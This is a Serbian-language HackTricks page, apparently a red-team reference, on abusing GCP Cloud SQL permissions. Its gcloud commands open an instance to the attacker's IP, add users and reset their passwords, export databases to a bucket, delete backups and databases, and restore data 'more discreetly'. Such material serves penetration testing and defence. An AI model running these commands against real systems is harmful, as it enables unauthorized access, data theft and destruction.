Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)!
Drugi načini podrške HackTricks-u:
- Ako želite da vidite vašu kompaniju reklamiranu na HackTricks-u ili preuzmete HackTricks u PDF formatu proverite SUBSCRIPTION PLANS!
- Nabavite zvanični PEASS & HackTricks swag
- Otkrijte The PEASS Family, našu kolekciju ekskluzivnih NFT-ova
- Pridružite se 💬 Discord grupi ili telegram grupi ili nas pratite na Twitter-u 🐦 @hacktricks_live.
- Podelite svoje hakovanje trikova slanjem PR-ova na HackTricks i HackTricks Cloud github repozitorijume.
Za više informacija o Cloud SQL-u pogledajte:
{% content-ref url="../gcp-services/gcp-cloud-sql-enum.md" %} gcp-cloud-sql-enum.md {% endcontent-ref %}
Da biste se povezali sa bazama podataka, samo vam je potreban pristup portu baze podataka i da znate korisničko ime i lozinku, nema nikakvih zahteva za IAM. Dakle, jednostavan način da dobijete pristup, pretpostavljajući da baza podataka ima javnu IP adresu, je da ažurirate dozvoljene mreže i omogućite pristup sa vaše sopstvene IP adrese.
# Use --assign-ip to make the database get a public IPv4
gcloud sql instances patch $INSTANCE_NAME \
--authorized-networks "$(curl ifconfig.me)" \
--assign-ip \
--quiet
mysql -h <ip_db> # If mysql
# With cloudsql.instances.get you can use gcloud directly
gcloud sql connect mysql --user=root --quiet
Takođe je moguće koristiti --no-backup
da prekinete rezervne kopije baze podataka.
Pošto nisam potpuno siguran za šta su potrebne dozvole cloudsql.instances.connect
i cloudsql.instances.login
, ako znate, pošaljite PR!
Dobijte listu svih korisnika baze podataka:
gcloud sql users list --instance <intance-name>
Ova dozvola omogućava kreiranje novog korisnika unutar baze podataka:
gcloud sql users create <username> --instance <instance-name> --password <password>
Ova dozvola omogućava ažuriranje korisnika unutar baze podataka. Na primer, možete promeniti njegovu lozinku:
{% code overflow="wrap" %}
gcloud sql users set-password <username> --instance <instance-name> --password <password>
{% endcode %}
Rezervne kopije mogu sadržavati stare osetljive informacije, pa je interesantno da ih proverite.
Vratite rezervnu kopiju unutar baze podataka:
gcloud sql backups restore <backup-id> --restore-instance <instance-id>
Da biste to uradili na diskretniji način, preporučuje se kreiranje nove SQL instance i vraćanje podataka tamo umesto u trenutno pokrenutim bazama podataka.
Ova dozvola omogućava brisanje rezervnih kopija:
gcloud sql backups delete <backup-id> --instance <instance-id>
Izvezi bazu podataka u Cloud Storage Bucket kako biste joj mogli pristupiti odatle:
# Export sql format, it could also be csv and bak
gcloud sql export sql <instance-id> <gs://bucketName/fileName>
Uvezi bazu podataka (prepiši) iz Cloud Storage Bucket-a:
# Import format SQL, you could also import formats bak and csv
gcloud sql import sql <instance-id> <gs://bucketName/fileName>
Obrišite bazu podataka sa instancije baze podataka:
gcloud sql databases delete <db-name> --instance <instance-id>
Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)!
Drugi načini podrške HackTricks-u:
- Ako želite da vidite vašu kompaniju reklamiranu na HackTricks-u ili preuzmete HackTricks u PDF formatu proverite PLANOVE ZA PRETPLATU!
- Nabavite zvanični PEASS & HackTricks swag
- Otkrijte The PEASS Family, našu kolekciju ekskluzivnih NFT-ova
- Pridružite se 💬 Discord grupi ili telegram grupi ili nas pratite na Twitter-u 🐦 @hacktricks_live.
- Podelite svoje hakovanje trikove slanjem PR-ova na HackTricks i HackTricks Cloud github repozitorijume.